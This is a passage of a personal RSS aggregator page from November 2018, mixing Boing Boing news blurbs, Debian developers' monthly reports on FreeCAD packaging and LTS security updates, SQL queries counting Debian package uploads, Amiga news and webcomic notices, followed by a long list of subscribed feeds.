If you paid extra for Windows 10 "Pro," Microsoft had an unpleasant surprise for you: a misconfiguration in the company's license server resulted in the oldest Win 10 Pro installs (that is, those owned by Microsoft's earliest adopting customers) being downgraded to Windows 10 Home, with users' screens plastered with watermarks chiding them for not paying for their licenses (this went over great for everyone who was standing in front of an audience giving a presentation, apparently).

After a period of initial confusion, Microsoft finally admitted something was broken.

Shopify no-platforms Nazis (but not Breitbart) [Cory Doctorow – Boing Boing]

Canadian turnkey e-commerce giant Shopify has kicked its farthest-right customers off the service, banning made-in-Canada racists like the Proud Boys, but not wink-nudging white supremacists like Breitbart.

Congresswoman Alexandria Ocasio-Cortez can't afford to rent a DC apartment [Cory Doctorow – Boing Boing]

Proud Democratic Socialist Alexandria Ocasio-Cortez ran an insurgent campaign (working nights as a bartender in NYC with her campaigning clothes stashed in a paper bag behind the bar, changing after her shift and working the streets) that conquered New York, went national, and emboldened a "progressive caucus" of new Democratic legislators: now she's going to Congress to serve as the youngest woman ever elected to the lower house. Only one problem: she can't afford to rent a DC apartment for the three months between the election and her swearing-in, when she'll start drawing her Congressional salary.

Choire Sicha, New York Times advice columnist [Cory Doctorow – Boing Boing]

Internet funnyperson Choire "Awl" Sicha (previously) has a new gig: New York Times advice columnist; Sicha is not fucking around either: "The only circumstance in which you can ask this woman out is if she sends you a literal ink-on-paper invitation to do so, like, in calligraphy and maybe with a seal stamped in wax, which would be awesome. (Also might mean she’s a vampire?) But, sure, you can totally ask her out if you don’t care about (1) her security about working with men in any capacity forever or (2) your career! Then have a blast, cannonball as many lives as possible on your way down the trash chute." (via Kottke)

07:00

Kurt Kremitzki: Free Software Activities in October 2018 [Planet Debian]

Intro

Welcome to another monthly summary of my free software work. Currently I'm focusing on improving the state of packaging for FreeCAD and its ecosystem of dependencies and related packages in Debian Science. Additionally, I recently revived the FreeCAD Community Extras PPA as a way of staging these packages out to users for testing. If you are a FreeCAD user, developer, or simply a user of one of these packages, I would greatly appreciate your feedback and testing to identify bugs while my packages wait to make it into the Debian archive.

However, in the long-term, I plan to move away from spending so much time on Debian packaging and returning to FreeCAD core development, and a special not-so-secret related project: PostCAD, providing OpenCASCADE geometry & topology bindings plus CAD data and filetype format support for PostgreSQL, a la PostGIS. The goal is to build this out as a rich backend which FreeCAD can talk to about neat CAD stuff. It's a heaping of work, though, so I don't expect to have a public release until mid or late 2019.

I would like to find others who are interested in contributing to FreeCAD ecosystem packaging for mentorship. That way, my efforts are maintained by the community and the quality and availability of packages won't wane with my attention on them. Since FreeCAD participates in Google Summer of Code, this would be a great opportunity for interested university students to learn Debian packaging and improve the state of science & engineering software on Debian.

Anyway, on to my summary!

Debian News

This month, I officially became a Debian Maintainer. This is a basic level of formal membership in the Debian project, and it comes with limited upload rights to the archive. I can only upload packages for which I am marked as a maintainer, for example FreeCAD.

I took advantage of this to upload some improvements for FreeCAD which I had been sitting on. After a few tweaks, the package was ready for an upgraded upload from Experimental to Unstable, which begins the process of candidacy for Testing, the release pocket for the upcoming Debian 10.

Debian FreeCAD Gets Qt 5

/images/freecad-qt5.png

Most important about this upload, though was that FreeCAD is finally being built with Qt 5 support. While Qt 5 had been working for quite a while, we were waiting on a dependency to be uploaded to Debian, PySide 2, which finally was uploaded this summer. Because this is a big switch to flip, any testing and reporting of bugs for this Debian package would be appreciated!

FreeCAD Package Structure Reorganization

One of the other major packaging changes for FreeCAD 0.17 is that the package is no longer a single, monolithic freecad package. We now have:

  • a freecad metapackage, which installs the other packages
  • common files and resources (e.g. images) in freecad-common
  • freecad-runtime contains Python 2/3 compatible runtime files
  • the executable built against Python 2, freecad-python2
  • and the library files used by the executable, libfreecad-python2-0.17

There are several advantages to this approach. The first is that since freecad-common and freecad-runtime are just pictures, Python scripts, and the like, we can save space in the archive by only needing one copy of the package, instead of one for each supported architecture. For freecad-python2 and libfreecad-python2-0.17, one can see the advantage in the name: since these are Python 2 specific, we will soon be able to provide their Python 3 counterparts.

Ideally, by the time of the Debian 10 release, the FreeCAD 0.17 package will provide both Python 2 and 3 supported versions, and which one you want to use can be switched between using the alternatives system, which I will explain later in this post.

FreeCAD Python 3 Imminent

Like Qt 5, FreeCAD has supported Python 3 for quite some time. (Workbenches and 3rd party code are another story.) However, in Debian, a Python 3-enabled FreeCAD package is blocked by the pending upload of pivy 0.6. I helped coordinate the upstream release of this package but due to issues with its dependency Coin3D the upload is stalled until those issues are resolved.

Community Extras PPA - Early Packge Previews

Now that we have the Community Extras PPA, it serves as a convenient location for me to upload packages as soon as I have one completed and ready for testing. Here are my uploads this month.

Gmsh 4

/images/gmsh-airplane.png

Gmsh has released a major version upgrade, which includes removing the experimental Java API and introducing Julia bindings, although this package doesn't do anything with them. The current version in the Debian archives is 3.0.6.

This package is only available on Bionic (Ubuntu 18.04) due to its dependencies. I hadn't tried on Cosmic (Ubuntu 18.10) since I worked on this in the beginning of October and it wasn't released yet.

Calculix 2.14

/images/calculix-turbocharger.jpeg

CalculiX in Debian is currently several versions behind (2.11) so I got a request to package this. However, CalculiX actually spans several packages, but calculix-ccx, the solver, is the only one used by FreeCAD, so unlike the other packages, this one is not quite ready for Debian until the other ones are done as well, since they are separate source packages.

This package is available on Bionic and Xenial (Ubuntu 16.04).

Translated FreeCAD-Doc Packages

One of the big areas for improvement in FreeCAD is the state of its documentation, and I'm glad to announce that one big improvement is on its way. I have been working on a standalone freecad-doc package, since it was removed from the Debian archive for being derived from pre-compiled binary files. This package involves using a local synced copy of the FreeCAD Wiki text and images, and using the script that was used to generate the aforementioned binary files.

The main improvement my package offers is support for the two most complete translations of the FreeCAD wiki, French and Italian. This is accomplished by making freecad-doc a metapackage which depends on any one of freecad-doc-en, -it, or -fr being installed. Then, the relevant files in freecad-doc upon which freecad will call are in fact managed symlinks to the appropriate translations. The symlinks are managed by the DebianAlternatives system (see update-alternatives(1).)

In order to switch between translations if more than one is installed, you can run sudo update-alternatives --config freecad-doc. This will control the in-program help for FreeCAD, so when you click the "What's this?" button, the resultant help page will be the translated version.

Additionally, compiled PDFs of the FreeCAD help are provided for all three languages.

One result of the nature of this package is that it is quite large: each freecad-doc translated package weighs in about 300 MB so the combined size is about 1.2 GB, per Ubuntu distribution.

As a result, this package is only available on Bionic and Xenial.

PyCOLLADA 0.6, now with Python 3!

/images/collada.jpeg

Another package which is fairly out of date in Debian (version 0.4 present), I decided to update it since pycollada is a dependency of FreeCAD and I am intrigued by the possibilities of the COLLADA (COLLAborative Design Activity) format. This allows for interchange with interactive 3D applications like Blender.

The big news with this package is that Python 3 support is now available, so I updated the source packaging to provide both Python 2 and 3 packages.

Again due to dependencies, it's only available on Cosmic and Bionic.

Sponsors

My work on Debian Science and FreeCAD is supported by my patrons at https://patreon.com/kkremitzki. Thank you all very much!

If you appreciate my work as described in this post, any level of support is greatly appreciated, including moral support!

Social Media

You can follow me on Twitter at @thekurtwk. I'm also currently working on a Twitch streaming setup, which I hope to have ready by the end of the year! I'll be trying out some live programming, engineering, and Linux gaming. You can find me at twitch.tv/kkremitzki.

06:42

Bruce Sterling on architecture, design, science fiction, futurism and involuntary parks [Cory Doctorow – Boing Boing]

In 1918, there was plenty of speculation about 2018; in 2018, no one is talking about 2118. Bruce Sterling discusses the relationship of industrial design to science fiction; the New Aesthetic and Turinese architecture; and many other subjects with Benjamin Bratton. (via Beyond the Beyond)

05:28

Master Bastion of the Indie Rock Scene [Diesel Sweeties webcomic by rstevens]

this is a diesel sweeties comic strip

Tonight’s comic is about the master bastion of the indie rock scene

Girl Genius for Friday, November 09, 2018 [Girl Genius]

The Girl Genius comic for Friday, November 09, 2018 has been posted.

02:42

Fantastic Voyage [QC RSS]

RIP Claire

02:21

Classic Amiga emulation on the X5000 [OSNews]

Speaking of Amiga, Mark Round has written a great blog post about running old AmigaOS 3.x software on AmigaOS 4, and the best ways to do so.

While I've been having a lot of fun with the new software written specifically for AmigaOS 4, the bulk of my software is still "classic" titles that used to run on my A1200. One of the first things I did when I set up my X5000 was to transfer my old Amiga's hard drive over so I could continue running this library of software. I also wanted to set up an emulation of my A1200 so I can quickly launch a classic Workbench 3.9 session and pick up all my old projects and bits of code I'd written over the years. Fortunately, the X5000 and AmigaOS 4 offers a variety of ways of running all your old software.

Icaros Desktop 2.2.4 released [OSNews]

A brand new version of Icaros Desktop is now available to everyone. V2.2.4 includes new brilliant features and applications, small but important fixes and, for you Amiga lovers, a vintage GUI that can be selected after installation, which reproduces the plain old Amiga OS 3.1 interface.

Icaros Desktop is one of the easiest ways to experiences AROS, the open source Amiga-like operating system for x86.

00:00

Markus Koschany: My Free Software Activities in October 2018 [Planet Debian]

Welcome to gambaru.de. Here is my monthly report that covers what I have been doing for Debian. If you’re interested in Java, Games and LTS topics, this might be interesting for you.

Debian Games

  • Again Yavor Doganov saved the day by porting monster-masher away from obsolete libraries like esound and gconfmm (RC, #848052, #856086, #885037). I reviewed and sponsored the package for him again.
  • Gürkan Myczko prepared a new upstream version of greed, a classic text-console game. I provided a desktop icon and sponsored the upload.
  • Several games failed to build from source because freetype-config is gone and pkg-config must be used from now on. That required RC bug fixes in asc (#887600),  brutalchess (#892337, patch by Reiner Herrmann), cube2font (#892330, patch by Reiner Herrmann with additional updates by Martin Erik Werner) and scorched3d (#892434, patch by Adrian Bunk)
  • I packaged new upstream versions of pcsx2, a Playstation 2 emulator, to fix RC bug #907411, also pygame-sdl2, renpy and bzflag.
  • I refreshed the packaging of abe, asc-music, amoebax, angrydd, airstrike, burgerspace, berusky2 and berusky-data.
  • Dima Kogan approached me about improving the current Bullet packaging and provided patches to build the double-precision library versions too.  Bullet is a state-of-the-art C++ library for 3D collision detection, soft body and rigid body dynamics. I once introduced it to Debian because it was a required build-dependency of freeorion. Nowadays it powers several scientific applications. I still maintain it because I think it is a very useful library, e.g. used among others by openrobotics.
  •  I spent most of the time this month on updating Teeworlds. Since I run a Teeworlds server myself I discovered a remote denial-of-service vulnerability first hand. Of course my server was not the only target and the upstream developers  had already released a fix. But I only got aware of it by chance. So I requested CVE-2018-18541, packaged the latest upstream release 0.7.0 and also prepared a security update for Stretch, released as DSA-4329-1.
  • Last but not least I sponsored a new game created and prepared by Gerardo Ballabio called galois. It is a tetris-like game with special features like 3D and different brick shapes. It is currently waiting in the NEW queue.

Debian Java

Misc

  • I sponsored android-platform-system-core for Kai-Chung Yan and did a non-maintainer upload for eboard, a chess client to fix RC bug #893167. I forwarded some patches and I hope we will see another upstream release in the near future that addresses some issues.
  • I packaged a new upstream release of ublock-origin.

Debian LTS

This was my thirty-second month as a paid contributor and I have been paid to work 30 hours on Debian LTS, a project started by Raphaël Hertzog. In that time I did the following:

  • From 08.10.2018 until 14.10.2018 and 29.10.2018 until 4.11.2018 I was in charge of our LTS frontdesk. I investigated and triaged CVE in gnulib, otrs2, tcpreplay, net-snmp, ghostscript, paramiko, pyopenssl, qpdf, requests, glassfish, imagemagick, tomcat8, tomcat7, moin, glusterfs, mono, tiff, systemd, network-manager, shellinabox, openssl, curl, squid3, icecast2, sdl-image1.2, libsdl2-image, mkvtoolnix, libapache-mod-jk, mariadb-10.0, mysql-connector-java and jasper.
  • There was a problem with our list manager and some announcements could not be preserved.
  • DLA-1535-1. Issued a security update for php-horde fixing 1 CVE.
  • DLA-1536-1. Issued a security update for php-horde-core fixing 1 CVE.
  • DLA-1537-1. Issued a security update for php-horde-kronolith fixing 1 CVE.
  • DLA-1540-1. Issued a security update for net-snmp fixing 1 CVE.
  • DLA-1543-1. Issued a security update for gnulib fixing 1 CVE.
  • DLA-1544-1. Issued a security update for tomcat7 fixing 1 CVE.
  • DLA-1545-1. Issued a security update for tomcat8 fixing 1 CVE.
  • DLA-1546-1. Issued a security update for moin fixing 1 CVE.
  • DLA-1552-1. Issued a security update for ghostscript fixing 3 CVE.
  • DLA-1564-1. Issued a security update for mono fixing 1 CVE.
  • DLA-1565-1. Issued a security update for glusterfs fixing 5 CVE.

ELTS

Extended Long Term Support (ELTS) is a project led by Freexian to further extend the lifetime of Debian releases. It is not an official Debian project but all Debian users benefit from it without cost. The current ELTS release is Debian 7 „Wheezy“. This was my fifth month and I have been paid to work 15  hours on ELTS.

  • I was in charge of our ELTS frontdesk from 15.10.2018 until 21.10.2018 and I triaged CVE in chromium-browser, ghostscript, openexr, unzip, virtualbox, elfutils, liblivemedia, exiv2, movabletype-opensource, quemu, quemu-kvm, tiff and tcpreplay.
  • ELA-50-1. Issued a security update for linux fixing 34 CVE.
  • ELA-51-1. Issued a security update for tomcat7 fixing 1 CVE.
  • ELA-54-1. Issued a security update for curl fixing 1 CVE.
  • ELA-55-1. Issued a security update for firmware-nonfree fixing 8 CVE.

Thanks for reading and see you next time.

Thursday, 08 November

23:14

Nicolas Dandrimont: Record number of uploads of a Debian package in an arbitrary 24-hour window [Planet Debian]

Since Dimitri has given me the SQL virus I have a hard time avoiding opportunities for twisting my brain.

Seeing the latest post from Chris Lamb made me wonder: how hard would it be to do better? Splitting by date is rather arbitrary (the split may even depend on the timezone you’re using when you’re doing the query), so let’s try to find out the maximum number of uploads that happened for each package in any 24 hour window.

First, for each upload, we get how many uploads of the same package happened in the subsequent 24 hours.

SELECT
  source,
  date,
  (
    SELECT
      count(*)
    FROM
      upload_history AS other_upload
    WHERE
      other_upload.source = first_upload.source
      AND other_upload.date >= first_upload.date
      AND other_upload.date < first_upload.date + '24 hours') AS count
  FROM
    upload_history AS first_upload

For each source package, we want the maximum count of uploads in a 24 hour window.

SELECT
  source,
  max(count)
FROM
  upload_counts
GROUP BY
  source

We can then join both queries together, to get the 24-hour window in which the most uploads of a given source package has happened.

WITH upload_counts AS (
  SELECT
    source,
    date,
    (
      SELECT
        count(*)
      FROM
        upload_history AS other_upload
      WHERE
        other_upload.source = first_upload.source
        AND other_upload.date >= first_upload.date
        AND other_upload.date < first_upload.date + '24 hours') AS count
    FROM
      upload_history AS first_upload
)
SELECT
  source,
  date,
  count
FROM
  upload_counts
INNER JOIN (
  SELECT
    source,
    max(count) AS max_uploads
  FROM
    upload_counts
  GROUP BY
    source
  ) AS m
  USING (source)
WHERE
  count = max_uploads
  AND max_uploads >= 9
ORDER BY
  max_uploads DESC,
  date ASC;

The results are almost the ones Chris has found, but cl-sql and live-config now have one more upload than live-boot.

       source       |          date          | count 
--------------------+------------------------+-------
 cl-sql             | 2004-04-17 03:34:52+00 |    14
 live-config        | 2010-07-15 17:19:11+00 |    14
 live-boot          | 2010-07-15 17:17:07+00 |    13
 zutils             | 2010-12-30 17:33:45+00 |    11
 belocs-locales-bin | 2005-03-20 21:05:44+00 |    10
 openerp-web        | 2010-12-30 17:32:07+00 |    10
 debconf            | 1999-09-25 18:52:37+00 |     9
 gretl              | 2000-06-16 18:53:11+00 |     9
 posh               | 2002-07-24 17:04:46+00 |     9
 module-assistant   | 2003-09-11 05:53:18+00 |     9
 live-helper        | 2007-04-20 18:16:38+00 |     9
 dxvk               | 2018-11-06 00:04:02+00 |     9
(12 lines)

Thanks to Adrian and Chris for the involuntary challenge!

22:28

Chris Lamb: Record number of uploads of a Debian package in a day [Planet Debian]

Previously, on IRC...

 * bunk looks at dxvk and wonders whether 9 uploads of a package on 1 day are a record

According to the Ultimate Debian Database, it turns out it isn't:

udd=> SELECT source, DATE(date) as day, COUNT(source) FROM upload_history
      GROUP BY (source, day)
      ORDER BY count DESC LIMIT 10;

      source       |    day     | count
--------------------+------------+-------
live-config        | 2010-07-15 |    13
live-boot          | 2010-07-15 |    13
cl-sql             | 2004-04-17 |    13
zutils             | 2010-12-30 |    11
openerp-web        | 2010-12-30 |    10
belocs-locales-bin | 2005-03-20 |    10
debconf            | 1999-09-25 |     9
dxvk               | 2018-11-06 |     9
live-helper        | 2007-04-20 |     9
module-assistant   | 2003-09-11 |     9
(10 rows)

Feeds

FeedRSSLast fetchedNext fetched after
XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
a bag of four grapes XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
A Smart Bear: Startups and Marketing for Geeks XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
All - O'Reilly Media XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Anarcho's blog XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
Ansible XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
Bad Science XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
Black Doggerel XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
Blog – Official site of Stephen Fry XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
Broodhollow XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
Charlie Brooker | The Guardian XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Charlie's Diary XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Chasing the Sunset - Comics Only XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
Clay Shirky XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
Coding Horror XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
Cory Doctorow – Boing Boing XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
Cory Doctorow's craphound.com XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Ctrl+Alt+Del Comic XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Cyberunions XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
David Mitchell | The Guardian XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
Debian GNU/Linux System Administration Resources XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
Deeplinks XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
Diesel Sweeties webcomic by rstevens XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
Dork Tower XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Edmund Finney's Quest to Find the Meaning of Life XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
Eerie Cuties XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
EFF Action Center XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
Enspiral Tales - Medium XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
Erin Dies Alone XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
Events XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Falkvinge on Liberty XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Flipside XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Free software jobs XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
Full Frontal Nerdity by Aaron Williams XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
General Protection Fault: The Comic Strip XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
George Monbiot XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
Girl Genius XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
God Hates Astronauts XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Graeme Smith XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
Groklaw XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Hackney Anarchist Group XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
http://cashing-knowledge.jp/?feed=rss2 XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
http://dungeond.com/comic.rss XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
http://dynamic.boingboing.net/cgi-bin/mt/mt-cp.cgi?__mode=feed&_type=posts&blog_id=1&id=1 XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
http://eng.anarchoblogs.org/feed/atom/ XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
http://feed43.com/3874015735218037.xml XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
http://feeds2.feedburner.com/GeekEtiquette?format=xml XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
http://fulltextrssfeed.com/feeds2.feedburner.com/uclick/doonesbury?format=xml XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
http://london.indymedia.org/articles.rss XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
http://pipes.yahoo.com/pipes/pipe.run?_id=ad0530218c055aa302f7e0e84d5d6515&amp;_render=rss XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
http://the-programmers-stone.com/feed/ XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
http://thecommune.co.uk/feed/ XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
http://ubuntuweblogs.org/atom.xml XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
http://www.airshipentertainment.com/buck/buckcomic/buck.rss XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
http://www.airshipentertainment.com/growf/growfcomic/growf.rss XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
http://www.airshipentertainment.com/myth/mythcomic/myth.rss XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
http://www.amongruins.org/?feed=atom XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
http://www.baen.com/baenebooks XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
http://www.dcscience.net/feed/medium.co XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
http://www.feedsapi.com/makefulltextfeed.php?url=http%3A%2F%2Fwww.somethingpositive.net%2Fsp.xml&what=auto&key=&max=7&links=preserve&exc=&privacy=I+accept XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
http://www.freedompress.org.uk/news/feed/ XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
http://www.goblinscomic.com/category/comics/feed/ XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
http://www.google.com/calendar/feeds/q7s5o02sj8hcam52hutbcofoo4%40group.calendar.google.com/public/basic XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
http://www.steampunkmagazine.com/inside/feed/ XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
http://www.tinycat.co.uk/feed/ XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
https://hackbloc.org/rss.xml XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
https://kajafoglio.livejournal.com/data/atom/ XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
https://kimmo.suominen.com/stuff/dilbert-daily.xml XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
https://philfoglio.livejournal.com/data/atom/ XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
https://studiofoglio.livejournal.com/data/atom/ XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
https://twitter.com/statuses/user_timeline/22724360.rss XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
https://web.randi.org/?format=feed&type=rss XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
https://www.hackneysolidarity.info/rss.xml XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
https://www.newstatesman.com/feeds/blogs/laurie-penny.rss XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
https://www.rightmove.co.uk/rss/property-for-sale/find.html?locationIdentifier=REGION^876&maxPrice=240000&minBedrooms=2&displayPropertyType=houses&oldDisplayPropertyType=houses&primaryDisplayPropertyType=houses&oldPrimaryDisplayPropertyType=houses&numberOfPropertiesPerPage=24 XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
Humble Bundle Blog XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
I, Cringely XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Irregular Webcomic! XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
Joel on Software XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
Judith Proctor's Journal XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
Krebs on Security XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
Lambda the Ultimate - Programming Languages Weblog XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
LFG Comics XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
LLVM Project Blog XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
Loomio Blog XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
LWN.net XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
Menage a 3 XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
Mimi and Eunice XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
Neil Gaiman's Journal XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
Nina Paley's Blog XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
O Abnormal – Scifi/Fantasy Artist XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
Oglaf! -- Comics. Often dirty. XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Oh Joy Sex Toy XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
Order of the Stick XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
Original Fiction – Tor.com XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
OSNews XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
Paul Graham: Unofficial RSS Feed XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
Penny Arcade XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Penny Red XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
PHD Comics XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
Phil's blog XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
Planet Debian XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
Planet GridPP XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
Planet Lisp XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
Property is Theft! XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
QC RSS XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
Scenes From A Multiverse XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
Schneier on Security XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
SCHNEWS.ORG.UK XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
Scripting News XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Seth's Blog XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
Skin Horse XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Starslip by Kris Straub XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Tales From the Riverbank XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
The Adventures of Dr. McNinja XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
The Bumpycat sat on the mat XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
The Command Line XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
The Daily WTF XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
The Monochrome Mob XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
The Non-Adventures of Wonderella XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
The Old New Thing XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
The Open Source Grid Engine Blog XML 16:56, Tuesday, 13 November 17:43, Tuesday, 13 November
The Phoenix Requiem XML 16:21, Tuesday, 13 November 17:01, Tuesday, 13 November
The Rogues Gallery XML 16:56, Tuesday, 13 November 17:44, Tuesday, 13 November
The Stranger, Seattle's Only Newspaper: Savage Love XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
TorrentFreak XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
towerhamletsalarm XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
Twokinds XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
UK Indymedia Features XML 16:35, Tuesday, 13 November 17:17, Tuesday, 13 November
Uploads from ne11y XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
Uploads from piasladic XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November
Wayward Sons: Legends - Sci-Fi Full Page Webcomic - Updates Daily XML 16:42, Tuesday, 13 November 17:28, Tuesday, 13 November
What If? XML 16:28, Tuesday, 13 November 17:09, Tuesday, 13 November
Whatever XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
Whitechapel Anarchist Group XML 16:14, Tuesday, 13 November 17:03, Tuesday, 13 November
WIL WHEATON dot NET XML 16:49, Tuesday, 13 November 17:33, Tuesday, 13 November
wish XML 16:49, Tuesday, 13 November 17:34, Tuesday, 13 November
xkcd.com XML 16:49, Tuesday, 13 November 17:32, Tuesday, 13 November